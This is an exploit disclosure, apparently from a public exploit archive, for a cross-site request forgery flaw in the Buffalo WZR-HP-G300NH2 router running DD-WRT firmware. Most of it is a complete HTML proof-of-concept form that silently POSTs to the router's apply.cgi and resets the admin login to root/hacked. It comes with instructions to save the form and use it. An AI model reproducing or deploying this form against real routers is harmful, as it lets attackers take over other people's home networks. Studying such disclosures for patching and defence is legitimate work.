06/11/2013

Buffalo WZR-HP-G300NH2 - CSRF Vulnerability

######################################################################
# Exploit Title: Buffalo WZR-HP-G300NH2 CSRF Vulnerability
# Author: Prayas Kulshrestha
# E-mail: officialnlsprayas@gmail.com
# Category: Hardware
# Google Dork: N/A
# Date: 06/10/2013
# Vendor: http://www.buffalotech.com
# Model: WZR-HP-G300NH2
# Firmware Version:  DD-WRT v24SP2-MULTI (10/31/11) std - build 17798
# Product: http://www.buffalo-asia.com/hongkong/products/product_details.php?id=466&;name=WZR-HP-G300NH2
# Tested on: Windows 7 (ultimate) 64-bit
######################################################################

#Introduction
==============
WZR-HP-G300NH2 is a high speed wireless LAN solution and complies with standard IEEE 802.11n 300 Mbps as well as High Power feature.
Wired LAN also supports the Gigabit Ethernet that no matter in the wired or wireless transmission,
WZR-HP-G300NH2 brings the high quality video era and realizes the comfortable wireless network environment.
Wireless Security Supports WPA2-PSK (AES, TKIP), WPA-PSK (AES, TKIP), 128/64-bit WEP and sets the wireless security of each level respectively.
USB2.0 port may be connected to Buffalo's USB external hard drive for network storage after simple setting.

#Description of Vulnerability
=============================
There is a CSRF vulnerability in the Buffalo WZR-HP-G300NH2 and any one easily change or manipulate the admin username and password. This is will POST request and any one can craft malicious html form with specially crafted POST request
to the router and on execution of the form the router's user name and password can be changed to anything.

#Exploit
========

<html>
  <!-- Exploit Code by Prayas Kulshrestha -->
  <body>
  <h1>This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)</h1>
  <h2>click below to see the magic<h2>

    <form action="http://192.168.1.1/apply.cgi"; method="POST">
      <input type="hidden" name="submit_button" value="Management" />
      <input type="hidden" name="action" value="ApplyTake" />
      <input type="hidden" name="change_action" value="" />
      <input type="hidden" name="submit_type" value="" />
      <input type="hidden" name="commit" value="1" />
      <input type="hidden" name="PasswdModify" value="0" />
      <input type="hidden" name="remote_mgt_https" value="0" />
      <input type="hidden" name="http_enable" value="1" />
      <input type="hidden" name="info_passwd" value="0" />
      <input type="hidden" name="https_enable" value="0" />
      <input type="hidden" name="http_username" value="root" />
      <input type="hidden" name="http_passwd" value="hacked" />
      <input type="hidden" name="http_passwdConfirm" value="hacked" />
      <input type="hidden" name="_http_enable" value="1" />
      <input type="hidden" name="refresh_time" value="3" />
      <input type="hidden" name="status_auth" value="1" />
      <input type="hidden" name="maskmac" value="1" />
      <input type="hidden" name="remote_management" value="0" />
      <input type="hidden" name="remote_mgt_ssh" value="0" />
      <input type="hidden" name="remote_mgt_telnet" value="0" />
      <input type="hidden" name="remote_ip_any" value="1" />
      <input type="hidden" name="remote_ip" value="4" />
      <input type="hidden" name="remote_ip_0" value="0" />
      <input type="hidden" name="remote_ip_1" value="0" />
      <input type="hidden" name="remote_ip_2" value="0" />
      <input type="hidden" name="remote_ip_3" value="0" />
      <input type="hidden" name="remote_ip_4" value="0" />
      <input type="hidden" name="boot_wait" value="on" />
      <input type="hidden" name="cron_enable" value="1" />
      <input type="hidden" name="cron_jobs" value="" />
      <input type="hidden" name="nas_enable" value="1" />
      <input type="hidden" name="resetbutton_enable" value="1" />
      <input type="hidden" name="zebra_enable" value="1" />
      <input type="hidden" name="ipv6_enable0" value="0" />
      <input type="hidden" name="radvd_enable" value="0" />
      <input type="hidden" name="radvd_conf" value="" />
      <input type="hidden" name="enable_jffs2" value="0" />
      <input type="hidden" name="clean_jffs2" value="0" />
      <input type="hidden" name="language" value="english" />
      <input type="hidden" name="tcp_congestion_control" value="vegas" />
      <input type="hidden" name="ip_conntrack_max" value="4096" />
      <input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600" />
      <input type="hidden" name="ip_conntrack_udp_timeouts" value="120" />
      <input type="hidden" name="samba_mount" value="0" />
      <input type="hidden" name="samba_share" value="//yourserverip/yourshare" />
      <input type="hidden" name="samba_user" value="username/computer" />
      <input type="hidden" name="samba_password" value="iwer573495u7340" />
      <input type="hidden" name="samba_script" value="yourscript" />
      <input type="submit" value="Owned !" />
    </form>
  </body>
</html>


==========
Save this as anything.htm and this will change the router's user name and password.
username:root
password:hacked

#Greetz to : All Indian Hackers.